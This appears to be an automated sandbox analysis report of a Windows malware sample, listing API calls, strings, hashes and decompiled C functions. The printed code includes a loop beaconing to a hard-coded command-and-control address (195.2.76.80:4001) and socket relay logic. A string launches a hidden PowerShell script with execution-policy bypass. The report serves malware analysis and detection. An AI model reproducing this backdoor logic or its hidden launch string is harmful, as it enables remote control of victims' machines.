0x00000000
0x00401c20
0x00401c30
0x00401c35
0x00401c39
0x00401c3d
0x00401eab
0x00401eae
0x00401f8c
0x00401f91
0x00401f91
0x00000000
0x00401f91
0x00401ec2
0x00401ec7
0x00401ec9
0x00000000
0x00000000
0x00401ecf
0x00401ed8
0x00401ee3
0x00401ee9
0x00401ef1
0x00401eff
0x00401f04
0x00401f0a
0x00401f10
0x00401f16
0x00401f1a
0x00401f29
0x00401f2b
0x00401f2d
0x00401f2f
0x00401f1c
0x00401f1c
0x00401f1e
0x00401f20
0x00401f22
0x00401f22
0x00401f34
0x00401f3b
0x00401f45
0x00401f4d
0x00401f4e
0x00401f50
0x00401f52
0x00401f59
0x00401f71
0x00000000
0x00401f71
0x00401c43
0x00401c46
0x00401c4a
0x00401c4f
0x00401c5a
0x00401c7a
0x00401c7a
0x00401c7a
0x00401c7c
0x00000000
0x00000000
0x00401c61
0x00401c66
0x00401c79
0x00401c79
0x00000000
0x00401c79
0x00401c68
0x00401c6c
0x00401c72
0x00000000
0x00401c72
0x00401c7e
0x00401c85
0x00401c8c
0x00401c93
0x00401c9e
0x00401ca3
0x00401cab
0x00401cad
0x00401cb4
0x00401cbb
0x00401cc2
0x00401cc2
0x00401cc9
0x00401cd1
0x00401cd3
0x00401cda
0x00401ce1
0x00401ce8
0x00401ce8
0x00401cef
0x00401cf7
0x00401cf9
0x00401d00
0x00401d07
0x00401d0e
0x00401d0e
0x00401d15
0x00401d1d
0x00401d1f
0x00401d26
0x00401d2d
0x00401d34
0x00401d34
0x00401d46
0x00401d4b
0x00401d50
0x00401e9a
0x00401ea1
0x00000000
0x00401d56
0x00401d56
0x00401d5c
0x00401d5f
0x00401d72
0x00401d84
0x00401d9b
0x00401da0
0x00401da9
0x00401dae
0x00401dae
0x00401db4
0x00401dbc
0x00401dbc
0x00401dbf
0x00401dc6
0x00401dc9
0x00401dca
0x00401dca
0x00401dca
0x00401dd1
0x00401dd2
0x00401dd9
0x00401de3
0x00401dea
0x00401e14
0x00401e1c
0x00401e1d
0x00401e21
0x00401e22
0x00401e2c
0x00401e95
0x00401e2e
0x00401e3c
0x00401e49
0x00401e5e
0x00401e7c
0x00401e7c
0x00000000
0x00401e2c
0x00401d50
0x00401c1a
0x00401bc1
0x00401bc6
0x00401bc8
0x00000000
0x00000000
0x00401bce
0x00401bdb
0x00000000
0x00401bdb
0x00401b6f
0x00401b72
0x00401b89
0x00401b89
0x00401b8d
0x00401b95
0x00401b9b
0x00401b9b
0x00000000
0x00401b95
0x00401b74
0x00401b78
0x00000000
0x00000000
0x00401b7a
0x00000000
0x00401b7a
0x00401b5b
0x00401b62
0x00401fa7
0x00401fab
0x00401fe2
0x00401fe2
0x00401fed
0x00401ff3
0x00401ff6
0x00401ff8
0x00401ff8
0x00402003
0x00402008
0x0040200b
0x0040200e
0x00402014
0x0040201b
0x00402027
0x00402027
0x00000000
0x0040201b
0x00401fbd
0x00401fc2
0x00401fc4
0x00000000
0x00000000
0x00401fc6
0x00401fd0
0x00401fdd
0x00000000
0x00401fdd
0x00000000
0x00401b62
0x00401aeb
0x004019c2
0x004019c9
0x00000000
0x004019cf
0x004019cf
0x00000000
0x004019cf

APIs

CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,?,?,?,004015C1,?,?,?,4001,000000FF), ref: 004019A3
VirtualAlloc.KERNEL32(00000000,00010000,00003000,00000004,00000000,00000000,00000001,00000000,?,?,?,?,?,?,004015C1,?), ref: 004019C2
VirtualAlloc.KERNEL32(00000000,00010000,00003000,00000004,00000000,00000000,00000001,00000000,?,?,?,?,?,?,004015C1,?), ref: 004019E0
GetUserNameExA.SECUR32(00000002,?,?,00000000,00010000,00003000,00000004,00000000,00000000,00000001,00000000,?,?), ref: 00401A00
WSAIoctl.WS2_32(?,98000004,00000001,0000000C,00000000,00000000,?,00000000,00000000), ref: 00401A70
GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00405081,?,00000032), ref: 00401ABE
select.WSOCK32(00000000,?,00000000,00000000,?,?,00000000,?,00000078,00000000,?,00000000,00000002,?,?,00000000), ref: 00401B1D
GetTempPathA.KERNEL32(00000200,?,?,?,00000007,?,00405081,00000032,3173702E,00000004,00405081,00000032,?,00000003,00000023,?), ref: 00401DA9

Part of subcall function 004020A8: CoInitialize.OLE32(00000000), ref: 004020DC
Part of subcall function 004020A8: CoCreateInstance.OLE32(?,00000000,00000001,?,?,004050CB,00000010,?,004050BB,00000010,?,00000000,?,?,?,?), ref: 0040211D

VirtualAlloc.KERNEL32(00000000,00010000,00003000,00000004,00405081,00000032,?,00000000,?,00000000,00000002,?,?,00000000,?,?), ref: 00401EC2
socket.WSOCK32(00000002,00000001,00000006,?,00000188,00000004,?,00000000,00000180,00000000,00010000,00003000,00000004,00405081,00000032,?), ref: 00401F22
socket.WSOCK32(00000017,00000001,00000006,?,00000188,00000004,?,00000000,00000180,00000000,00010000,00003000,00000004,00405081,00000032,?), ref: 00401F2F
setsockopt.WSOCK32(?,00000006,00000001,00000001,00000004,00000017,00000001,00000006,?,00000188,00000004,?,00000000,00000180,00000000,00010000), ref: 00401F59
CreateThread.KERNEL32 ref: 00401F6C
CloseHandle.KERNEL32(?,?,00000000,00010000,00003000,00000004,00000000,00000000,00000001,00000000,?,?), ref: 0040206A
ExitProcess.KERNEL32(00000000,wow64), ref: 00402096

Part of subcall function 00402A1E: select.WSOCK32(00000000,?,00000000,00000000,?,?,00000000,?,?,00000000,?,?), ref: 00402A50
Part of subcall function 00402A1E: recv.WSOCK32(?,?,?,00000000,00000000,?,00000000,00000000,?,?,00000000,?,?,00000000,?,?), ref: 00402A65

Strings

exe, xrefs: 00401DD2, 00401DD8
-WindowStyle Hidden -ep bypass -file ", xrefs: 00401E37
wow64, xrefs: 0040208A
.ps1, xrefs: 00401D15
powershell, xrefs: 00401E6E

Memory Dump Source

Source File: 00000000.00000002.263716549.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: AllocCreateVirtual$selectsocket$CloseEventExitHandleInformationInitializeInstanceIoctlNamePathProcessTempThreadUserVolumerecvsetsockopt
String ID: -WindowStyle Hidden -ep bypass -file "$.ps1$exe$powershell$wow64
API String ID: 345091395-1962433723
Opcode ID: afde08c7f293585e493722803839a849b638ae0ebc6d989b589dbfa25a52abd1
Instruction ID: 722c77b160f5ee40301f9ae5c946d5cd53ffeaa08266815bf15082fc84fa5205
Opcode Fuzzy Hash: afde08c7f293585e493722803839a849b638ae0ebc6d989b589dbfa25a52abd1
Instruction Fuzzy Hash: 4812A470D44318AEEB319BA0CC45F9AB778AF04704F1041ABF6587A1D1D7F96A84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00621BCF, Relevance: 25.0, APIs: 12, Strings: 2, Instructions: 494memorynetworkthreadCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00010000,00003000,00000004,00000000,00000000,00000001,00000000,?,?,?,?,?,?,00621811,?), ref: 00621C12
VirtualAlloc.KERNEL32(00000000,00010000,00003000,00000004,00000000,00010000,00003000,00000004,00000000,00000000,00000001,00000000,?,?), ref: 00621C30
WSAIoctl.WS2_32(?,98000004,00000001,0000000C,00000000,00000000,?,00000000,00000000), ref: 00621CC0
GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00405081,?,00000032,?,98000004,00000001,0000000C,00000000), ref: 00621D0E
select.WS2_32(00000000,?,00000000,00000000,?), ref: 00621D6D
GetTempPathA.KERNEL32(00000200,?,?,?,00000007,?,00405081,00000032,3173702E,00000004,00405081,00000032,?,00000003,00000023,?), ref: 00621FF9

Part of subcall function 006222F8: CoInitialize.OLE32(00000000), ref: 0062232C

VirtualAlloc.KERNEL32(00000000,00010000,00003000,00000004,00405081,00000032,?,00000000,?,00000000,00000002,?,?,00000000,?,?), ref: 00622112
socket.WS2_32(00000002,00000001,00000006), ref: 00622172
socket.WS2_32(00000017,00000001,00000006), ref: 0062217F
CreateThread.KERNEL32(00000000,00000000,004015FC,?,00000000,00000000), ref: 006221BC
CloseHandle.KERNEL32(?,?,00000000,00010000,00003000,00000004,00000000,00000000,00000001,00000000,?,?), ref: 006222BA
ExitProcess.KERNEL32(00000000,0040510B,?,?,?,?,?,?,00000064,00000000,00405081,00000032,?,00000032,00000000,00000000), ref: 006222E6

Part of subcall function 00622C6E: select.WS2_32(00000000,?,00000000,00000000,?), ref: 00622CA0

Strings

exe, xrefs: 00622022, 00622028
.ps1, xrefs: 00621F65

Memory Dump Source

Source File: 00000000.00000002.263771547.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false

Similarity

API ID: AllocVirtual$selectsocket$CloseCreateExitHandleInformationInitializeIoctlPathProcessTempThreadVolume
String ID: .ps1$exe
API String ID: 2898658977-3476276980
Opcode ID: f7307226bdd116e6dbdf97e9d4f561f64b7fd0ca7a184a8d8671f3bf07478583
Instruction ID: da92d3961be1e17e3e9dc273795d35e3f93a464404cefadce4e44da91f60dcaa
Opcode Fuzzy Hash: f7307226bdd116e6dbdf97e9d4f561f64b7fd0ca7a184a8d8671f3bf07478583
Instruction Fuzzy Hash: C912F170D4472AFEEB319BA0DC46FD9B7BAAF14700F104099F648AA1C1C7B5AA84CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00402487, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 91
sleepfilethreadCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00402487(void* __eflags, struct HWND__* _a4) {
				char _v16;
				char _v260;
				char _v516;
				long _v520;
				char _v648;
				char* _v652;
				intOrPtr _v656;
				void* _v660;
				void* _v664;
				int _t33;
				void* _t36;
				void* _t45;
				CHAR* _t46;
				void* _t51;
				void* _t53;

				E00402BA3( &_v664,  &_v16 - _t53);
				GetWindowThreadProcessId(_a4,  &_v520);
				if(_v520 == GetCurrentProcessId()) {
					L9:
					return 1;
				}
				GetClassNameA(_a4,  &_v260, 0x100);
				_t33 = GetWindowTextA(_a4,  &_v516, 0x100);
				_t56 = _t33;
				if(_t33 == 0) {
					goto L9;
				}
				_t36 = E00402CFF(_t56, "win32app",  &_v260);
				_t57 = _t36;
				if(_t36 != 0 && E00402CFF(_t57, "Microsoft",  &_v516) != 0) {
					_t51 = 0x80;
					do {
						_t38 = E00402D95(_t38, 0x80);
						asm("stosb");
						_t51 = _t51 - 1;
					} while (_t51 != 0);
					_v660 = E00402D95(_t38, 0xee6b2800);
					_v656 = E00402D95(_t39, 0x80) + 1;
					_v652 =  &_v648;
					SendMessageA(_a4, 0x4a, 0,  &_v660);
					_t45 = OpenProcess(0x410, 0, _v520);
					if(_t45 != 0) {
						_v664 = _t45;
						_push(0x100);
						_t46 =  &_v260;
						_push(_t46);
						_push(0);
						_push(_v664);
						L004030F0();
						if(_t46 != 0) {
							Sleep(0x3e8);
							DeleteFileA( &_v260);
						}
					}
				}
			}

0x0040249e
0x004024ad
0x004024bd
0x004025cd
0x004025d6
0x004025d6
0x004024d2
0x004024e6
0x004024eb
0x004024ed
0x00000000
0x00000000
0x004024ff
0x00402504
0x00402506
0x0040252b
0x00402530
0x00402535
0x0040253a
0x0040253b
0x0040253b
0x00402548
0x00402559
0x00402565
0x00402579
0x0040258b
0x00402592
0x00402594
0x0040259a
0x0040259f
0x004025a5
0x004025a6
0x004025a8
0x004025ae
0x004025b5
0x004025bc
0x004025c8
0x004025c8
0x004025b5
0x00402592

APIs

GetWindowThreadProcessId.USER32(?,?), ref: 004024AD
GetCurrentProcessId.KERNEL32(?,?), ref: 004024B2
GetClassNameA.USER32(?,?,00000100), ref: 004024D2
GetWindowTextA.USER32 ref: 004024E6
SendMessageA.USER32 ref: 00402579
OpenProcess.KERNEL32(00000410,00000000,?,?,0000004A,00000000,?,00000080,EE6B2800,00000080,Microsoft,?,win32app,?,?,?), ref: 0040258B
GetModuleFileNameExA.PSAPI(?,00000000,?,00000100,00000410,00000000,?,?,0000004A,00000000,?,00000080,EE6B2800,00000080,Microsoft,?), ref: 004025AE
Sleep.KERNEL32(000003E8,?,00000000,?,00000100,00000410,00000000,?,?,0000004A,00000000,?,00000080,EE6B2800,00000080,Microsoft), ref: 004025BC
DeleteFileA.KERNEL32(?,000003E8,?,00000000,?,00000100,00000410,00000000,?,?,0000004A,00000000,?,00000080,EE6B2800,00000080), ref: 004025C8

Strings

Microsoft, xrefs: 00402513
win32app, xrefs: 004024FA

Memory Dump Source

Source File: 00000000.00000002.263716549.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Process$FileNameWindow$ClassCurrentDeleteMessageModuleOpenSendSleepTextThread
String ID: Microsoft$win32app
API String ID: 3712944067-2644191155
Opcode ID: 8d7e9357ac0bb652f3bb9afe8040b219932d9f3f890f17494fcfdf99fc8508eb
Instruction ID: 031a9dd2b1e095ba21a28822d09a49bd2918d4b5860b702cf13631af9897ca23
Opcode Fuzzy Hash: 8d7e9357ac0bb652f3bb9afe8040b219932d9f3f890f17494fcfdf99fc8508eb
Instruction Fuzzy Hash: 763147715112197AEB21AB51CD4AFEE77BCEF04344F4040BBB544F51C1EAF49E849B68

Uniqueness

Uniqueness Score: -1.00%

Function 004015FC, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 276
networkCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E004015FC(void* __eflags, intOrPtr _a4) {
				void* _v8;
				intOrPtr _v12;
				signed int _v16;
				void* _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				char _v40;
				char _v41;
				char _v42;
				char _v43;
				char _v44;
				char _v45;
				char _v46;
				char _v47;
				char _v48;
				char _v49;
				signed int _v51;
				signed int _v52;
				intOrPtr _v88;
				short _v90;
				char _v92;
				char _v96;
				char _v112;
				char _v116;
				short _v118;
				char _v120;
				char _v128;
				char _v140;
				char _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				char _v156;
				char _v160;
				signed short _t146;
				signed short _t158;
				char* _t167;
				char* _t172;
				intOrPtr _t181;
				signed int _t182;
				signed int _t185;
				intOrPtr* _t190;
				signed int _t191;
				char* _t192;
				intOrPtr _t193;
				intOrPtr _t194;
				void* _t196;

				E00402BA3( &_v160,  &_v16 - _t196);
				_t193 = _a4;
				E00402B1C(_t193 + 0x180,  &_v32, 4);
				E00402B1C(_t193 + 0x184,  &_v16, 4);
				E00402B1C(_t193 + 0x188,  &_v24, 4);
				E00402B1C(_t193 + 0x18c,  &_v8, 4);
				E00402B1C(_t193 + 0x190,  &_v20, 4);
				_t185 = _v16;
				_t190 = _v8;
				_v28 =  *((intOrPtr*)(_t190 + _t185 * 4));
				_v12 =  *_t190;
				_v52 = _t185;
				_v51 = 0xa;
				_v49 = 5;
				_v48 = 1;
				_v47 = 0;
				_v46 = 1;
				_v45 = 0;
				_v44 = 0;
				_v43 = 0;
				_v42 = 0;
				_v41 = 0;
				_v40 = 0;
				_v92 = 2;
				_t198 =  *((char*)(_t193 + 7)) - 3;
				if( *((char*)(_t193 + 7)) != 3) {
					__eflags =  *((char*)(_t193 + 7)) - 1;
					if( *((char*)(_t193 + 7)) != 1) {
						__eflags =  *((char*)(_t193 + 7)) - 4;
						if( *((char*)(_t193 + 7)) != 4) {
							L14:
							_t194 = _v8;
							_t182 = _v16;
							_t191 = _v51 & 0x0000ffff;
							E004025D9(0x405081, 0x32,  &_v52, 3);
							E004025D9(0x405081, 0x32,  &_v49, _t191);
							_t83 = _t191 + 3; // 0xd
							E00402997(_v12,  &_v52, _t83, _v24);
							E004025D9(0x405081, 0x32,  &_v52, 3);
							_t146 = E004025D9(0x405081, 0x32,  &_v49, _t191);
							if(_v48 != 0) {
								L24:
								 *((intOrPtr*)(_t194 + _t182 * 4)) = 0;
								E00402A71(_t146, _v28);
								_v51 = 0;
								E004025D9(0x405081, 0x32,  &_v52, 3);
								E00402997(_v12,  &_v52, 3, _v24);
								E0040151C( &_v20);
								 *((intOrPtr*)(_v32 + _t182 * 4)) = 0;
								return 0;
							}
							_t192 = _v20;
							while(1) {
								L16:
								while( *((intOrPtr*)(_t194 + _t182 * 4)) != 0) {
									E00402B69(_v28, 0,  &_v140, 0, 0x64);
									_push( &_v128);
									_push(0);
									_push(0);
									_t146 =  &_v140;
									_push(_t146);
									_push(0);
									L0040309C();
									__eflags = _t146;
									if(__eflags == 0) {
										goto L16;
									}
									if(__eflags < 0) {
										goto L24;
									}
									_push(0);
									_push(0xfffa);
									_t158 = _t192 + 3;
									_push(_t158);
									_push(_v28);
									L00403096();
									_t146 = _t158;
									__eflags = _t146;
									if(_t146 == 0) {
										L21:
										goto L24;
									}
									__eflags = _t146 - 0xffffffff;
									if(_t146 != 0xffffffff) {
										 *(_t192 + 1) = _t146;
										 *_t192 = _v16;
										E004025D9(0x405081, 0x32, _t192, 3);
										E004025D9(0x405081, 0x32, _t192 + 3,  *(_t192 + 1) & 0x0000ffff);
										_t146 = E00402997(_v12, _t192, ( *(_t192 + 1) & 0x0000ffff) + 3, _v24);
										continue;
									}
									goto L21;
								}
								goto L24;
							}
						}
						_v120 = 0x17;
						_v116 = 0;
						_v96 = 0;
						_v118 =  *((intOrPtr*)(_t193 + 0x18));
						E00402B1C(_t193 + 8,  &_v112, 0x10);
						L8:
						_v144 = 1;
						_t167 =  &_v144;
						_push(_t167);
						_push(0x8004667e);
						_push(_v28);
						L00403090();
						if(_t167 == 0) {
							if( *((char*)(_t193 + 7)) == 4) {
								_push(0x1c);
								_push( &_v120);
								_push(_v28);
								L00403084();
							} else {
								_push(0x10);
								_push( &_v92);
								_push(_v28);
								L00403084();
							}
							E00402B69(_v28, 0,  &_v140, 0xa, 0);
							_push( &_v128);
							_push(0);
							_t172 =  &_v140;
							_push(_t172);
							_push(0);
							_push(0);
							L0040309C();
							if(_t172 == 1) {
								_v144 = 0;
								_push( &_v144);
								_push(0x8004667e);
								_push(_v28);
								L00403090();
								_v156 = 1;
								_v152 = 0xea60;
								_v148 = 0x2710;
								_push(0);
								_push(0);
								_push( &_v160);
								_push(0);
								_push(0);
								_push(0xc);
								_push( &_v156);
								_push(0x98000004);
								_push(_v28);
								L004030C0();
								_v48 = 0;
							}
						}
						goto L14;
					}
					_v88 =  *((intOrPtr*)(_t193 + 8));
					_v90 =  *((intOrPtr*)(_t193 + 0xc));
					goto L8;
				}
				_v90 =  *((intOrPtr*)(0 + _t193 + 9));
				 *((char*)(0 + _t193 + 9)) = 0;
				_t181 = E00402A90(_t198, _t193 + 9, 2);
				if(_t181 == 0) {
					goto L14;
				} else {
					_v88 = _t181;
					goto L8;
				}
			}

0x00401613
0x00401618
0x00401628
0x0040163a
0x0040164c
0x0040165e
0x00401670
0x00401675
0x00401678
0x0040167e
0x00401683
0x00401686
0x00401689
0x0040168f
0x00401693
0x00401697
0x0040169b
0x0040169f
0x004016a3
0x004016a7
0x004016ab
0x004016af
0x004016b3
0x004016b7
0x004016bd
0x004016c1
0x004016ee
0x004016f2
0x00401704
0x00401708
0x0040181b
0x0040181b
0x0040181e
0x00401821
0x00401832
0x00401843
0x0040184b
0x00401856
0x00401868
0x00401879
0x00401882
0x00401928
0x00401928
0x00401932
0x00401937
0x0040194a
0x0040195b
0x00401964
0x0040196c
0x0040197c
0x0040197c
0x00401888
0x0040188b
0x0040188b
0x0040191e
0x004018a0
0x004018a8
0x004018a9
0x004018ab
0x004018ad
0x004018b3
0x004018b4
0x004018b6
0x004018bb
0x004018bd
0x00000000
0x00000000
0x004018bf
0x00000000
0x00000000
0x004018c1
0x004018c3
0x004018c8
0x004018cb
0x004018cc
0x004018cf
0x004018d4
0x004018d4
0x004018d6
0x004018dd
0x00000000
0x004018dd
0x004018d8
0x004018db
0x004018e1
0x004018e8
0x004018f8
0x00401909
0x00401919
0x00000000
0x00401919
0x00000000
0x004018db
0x00000000
0x0040191e
0x0040188b
0x0040170a
0x00401710
0x00401717
0x00401722
0x00401730
0x0040173c
0x0040173c
0x00401746
0x0040174c
0x0040174d
0x00401752
0x00401755
0x0040175c
0x00401766
0x00401778
0x0040177d
0x0040177e
0x00401781
0x00401768
0x00401768
0x0040176d
0x0040176e
0x00401771
0x00401771
0x00401796
0x0040179e
0x0040179f
0x004017a1
0x004017a7
0x004017a8
0x004017aa
0x004017ac
0x004017b4
0x004017b6
0x004017c6
0x004017c7
0x004017cc
0x004017cf
0x004017d4
0x004017de
0x004017e8
0x004017f2
0x004017f4
0x004017fc
0x004017fd
0x004017ff
0x00401801
0x00401809
0x0040180a
0x0040180f
0x00401812
0x00401817
0x00401817
0x004017b4
0x00000000
0x0040175c
0x004016f7
0x004016fe
0x00000000
0x004016fe
0x004016cd
0x004016d1
0x004016dc
0x004016e3
0x00000000
0x004016e9
0x004016e9
0x00000000
0x004016e9

APIs

ioctlsocket.WSOCK32(?,8004667E,00000001,?,?,?,?,?,00000010), ref: 00401755
connect.WSOCK32(?,00000002,00000010,?,8004667E,00000001,?,?,?,?,?,00000010), ref: 00401771
connect.WSOCK32(?,00000017,0000001C,?,8004667E,00000001,?,?,?,?,?,00000010), ref: 00401781
select.WSOCK32(00000000,00000000,?,00000000,?,?,00000000,?,0000000A,00000000,?,00000017,0000001C,?,8004667E,00000001), ref: 004017AC
ioctlsocket.WSOCK32(?,8004667E,00000000,00000000,00000000,?,00000000,?,?,00000000,?,0000000A,00000000,?,00000017,0000001C), ref: 004017CF
WSAIoctl.WS2_32(?,98000004,00000001,0000000C,00000000,00000000,?,00000000,00000000), ref: 00401812

Part of subcall function 00402A90: getaddrinfo.WS2_32(?,00000000,?,?), ref: 00402AD8

select.WSOCK32(00000000,?,00000000,00000000,?,?,00000000,?,00000000,00000064,00405081,00000032,00000005,0000000A,00405081,00000032), ref: 004018B6
recv.WSOCK32(?,?,0000FFFA,00000000,00000000,?,00000000,00000000,?,?,00000000,?,00000000,00000064,00405081,00000032), ref: 004018CF

Strings

`, xrefs: 004017DE

Memory Dump Source

Source File: 00000000.00000002.263716549.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: connectioctlsocketselect$Ioctlgetaddrinforecv
String ID: `
API String ID: 3309496413-1850852036
Opcode ID: e01886a0249fcd851e111ee8f633aefa2dd51d35bc546b7ea1ad8b63e593f3d4
Instruction ID: aaf0a3722a9e06a6a5b8a7ac42030edebb0200d921e59f8858e9fae40fd10b98
Opcode Fuzzy Hash: e01886a0249fcd851e111ee8f633aefa2dd51d35bc546b7ea1ad8b63e593f3d4
Instruction Fuzzy Hash: D0B14071940248BAEB21DBE0CC45FEEBBBCAF04704F10406AF655B71D1D7B9AA44CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0062184C, Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 276networkCOMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,8004667E,00000001), ref: 006219A5
connect.WS2_32(?,00000002,00000010), ref: 006219C1
connect.WS2_32(?,00000017,0000001C), ref: 006219D1
select.WS2_32(00000000,00000000,?,00000000,?), ref: 006219FC
ioctlsocket.WS2_32(?,8004667E,00000000), ref: 00621A1F
WSAIoctl.WS2_32(?,98000004,00000001,0000000C,00000000,00000000,?,00000000,00000000), ref: 00621A62
select.WS2_32(00000000,?,00000000,00000000,?), ref: 00621B06

Strings

`, xrefs: 00621A2E

Memory Dump Source

Source File: 00000000.00000002.263771547.0000000000620000.00000040.00000001.sdmp, Offset: 00620000, based on PE: false

Similarity

API ID: connectioctlsocketselect$Ioctl
String ID: `
API String ID: 2054606664-1850852036
Opcode ID: 436abe1d07a41c43e4658ce75f9b41527e3e02da19e43e5be8656f078b20de82
Instruction ID: fffc09273d4ab565b1cc6b7e4d163cc3320facf28fab0d90693e72f2ebc1cf3c
Opcode Fuzzy Hash: 436abe1d07a41c43e4658ce75f9b41527e3e02da19e43e5be8656f078b20de82
Instruction Fuzzy Hash: ADB1B071900659BEEB21DBE0DC42FEEBBBDAF05300F104059F645BA181D775AA48CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 004010F9, Relevance: 10.6, APIs: 7, Instructions: 90
networkCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E004010F9(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, short _a12, intOrPtr _a16) {
				char _v8;
				char _v16;
				char _v28;
				intOrPtr _v40;
				short _v42;
				char _v44;
				char _v300;
				char _v304;
				char _v308;
				char _t32;
				short _t40;
				char* _t46;
				void* _t52;
				void* _t53;

				_t53 = __eflags;
				_t32 = E00402BA3( &_v308,  &_v16 - _t52);
				_push(6);
				_push(1);
				_push(2);
				L004030B4();
				_v8 = _t32;
				E00402B1C( &_v8, _a4, 4);
				_v304 = 1;
				_push(4);
				_push( &_v304);
				_push(1);
				_push(6);
				_push(_v8);
				L004030A8();
				E00402BBA(_a8, 0xffffffff,  &_v300);
				_v40 = E00402A90(_t53,  &_v300, 2);
				_t40 = _a12;
				if(_t40 > 0x10000) {
					_t40 = E00402B34(_t40);
				}
				_push(_t40);
				L0040308A();
				_v42 = _t40;
				_v44 = 2;
				_v304 = 1;
				_push( &_v304);
				_push(0x8004667e);
				_push(_v8);
				L00403090();
				_push(0x10);
				_push( &_v44);
				_push(_v8);
				L00403084();
				E00402B69(_v8, 0,  &_v28, _a16, 0);
				_push( &_v16);
				_push(0);
				_t46 =  &_v28;
				_push(_t46);
				_push(0);
				_push(0);
				L0040309C();
				if(_t46 == 1) {
					_v304 = 0;
					_push( &_v304);
					_push(0x8004667e);
					_push(_v8);
					L00403090();
					_v308 = 1;
				}
				return _v308;
			}

0x004010f9
0x00401110
0x00401115
0x00401117
0x00401119
0x0040111b
0x00401120
0x0040112c
0x00401131
0x0040113b
0x00401143
0x00401144
0x00401146
0x00401148
0x0040114b
0x0040115c
0x0040116f
0x00401172
0x0040117a
0x0040117d
0x0040117d
0x00401182
0x00401183
0x00401188
0x0040118c
0x00401192
0x004011a2
0x004011a3
0x004011a8
0x004011ab
0x004011b0
0x004011b5
0x004011b6
0x004011b9
0x004011cc
0x004011d4
0x004011d5
0x004011d7
0x004011da
0x004011db
0x004011dd
0x004011df
0x004011e7
0x004011e9
0x004011f9
0x004011fa
0x004011ff
0x00401202
0x00401207
0x00401207
0x0040121b

APIs

socket.WSOCK32(00000002,00000001,00000006,?,?,?,?), ref: 0040111B
setsockopt.WSOCK32(?,00000006,00000001,?,00000004,?,?,00000004,00000002,00000001,00000006,?,?,?,?), ref: 0040114B

Part of subcall function 00402A90: getaddrinfo.WS2_32(?,00000000,?,?), ref: 00402AD8

htons.WSOCK32(?,?,00000002,?,000000FF,?,?,00000006,00000001,?,00000004,?,?,00000004,00000002,00000001), ref: 00401183
ioctlsocket.WSOCK32(?,8004667E,?,?,?,00000002,?,000000FF,?,?,00000006,00000001,?,00000004,?,?), ref: 004011AB
connect.WSOCK32(?,?,00000010,?,8004667E,?,?,?,00000002,?,000000FF,?,?,00000006,00000001,?), ref: 004011B9
select.WSOCK32(00000000,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,00000010,?,8004667E,?), ref: 004011DF
ioctlsocket.WSOCK32(?,8004667E,?,00000000,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,00000010), ref: 00401202

Memory Dump Source

Source File: 00000000.00000002.263716549.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ioctlsocket$connectgetaddrinfohtonsselectsetsockoptsocket
String ID:
API String ID: 783190390-0
Opcode ID: e2e8bb9b19666f276c986a7f38de213891938ff59194249ca9a3558135c2c430
Instruction ID: fd7f7d9d9863c24d04b1f11d191c8144f26a613158dfe5fb9220a3805e5880d9
Opcode Fuzzy Hash: e2e8bb9b19666f276c986a7f38de213891938ff59194249ca9a3558135c2c430
Instruction Fuzzy Hash: B1311A71900208BADF10EFA1CD46FDEBBBDEB04318F1040AAF604B60D1D7B59B549B69

Uniqueness

Uniqueness Score: -1.00%

Function 00401549, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 41
sleepnetworkCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00401549() {
				char _v402;
				char* _v412;
				char _v420;
				intOrPtr _v424;
				char _v440;
				char* _t14;
				void* _t22;
				void* _t23;
				void* _t24;

				E00402BA3( &_v440, _t23 - _t24);
				do {
					Sleep(0x2710);
					_t14 =  &_v402;
					_push(_t14);
					_push(0x202);
					L00403078();
					_t26 = _t14;
				} while (_t14 != 0);
				_v412 = "195.2.76.80";
				E00402BBA("4001", 0xffffffff,  &_v420);
				_v424 = E00402B34( &_v420);
				L3:
				while(E0040197F(_t22, _t26, _v412, _v424) == 0) {
					_t26 = _v412 - "195.2.76.80";
					if(_v412 != "195.2.76.80") {
						_v412 = "195.2.76.80";
					} else {
						_v412 = "195.2.76.80";
					}
				}
				Sleep(0x2bf20);
				goto L3;
			}

0x0040155d
0x00401562
0x00401567
0x0040156c
0x00401572
0x00401573
0x00401578
0x0040157d
0x0040157d
0x00401581
0x00401599
0x004015aa
0x00000000
0x004015b0
0x004015c5
0x004015cf
0x004015dd
0x004015d1
0x004015d1
0x004015d1
0x004015e7
0x004015ee
0x00000000

APIs

Sleep.KERNEL32(00002710,?), ref: 00401567
WSAStartup.WSOCK32(00000202,?,00002710,?), ref: 00401578
Sleep.KERNEL32(0002BF20,?,?,?,4001,000000FF,?,00000202,?,00002710,?), ref: 004015EE

Strings

195.2.76.80, xrefs: 004015D1
195.2.76.80, xrefs: 00401581, 004015C5, 004015DD
4001, xrefs: 00401594

Memory Dump Source

Source File: 00000000.00000002.263716549.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: Sleep$Startup
String ID: 195.2.76.80$195.2.76.80$4001
API String ID: 3152138391-3751687743
